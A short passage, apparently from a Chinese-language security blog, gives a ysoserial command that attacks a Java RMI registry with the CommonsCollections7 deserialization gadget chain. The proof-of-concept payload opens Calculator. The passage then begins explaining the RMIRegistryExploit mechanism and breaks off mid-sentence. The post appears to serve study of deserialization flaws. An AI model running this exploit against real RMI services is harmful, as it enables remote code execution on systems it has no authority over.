java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit RMIRegisterHost RMIRegisterPort CommonsCollections7 “open /System/Applications/Calculator.app”

简单看一下ysoserial.exploit.RMIRegisterExploit的原理. 根据前面文章中的原理,我们传过去的对象必须要是一个继承了java.rmi.



Source link

Write a comment:
*

Your email address will not be published.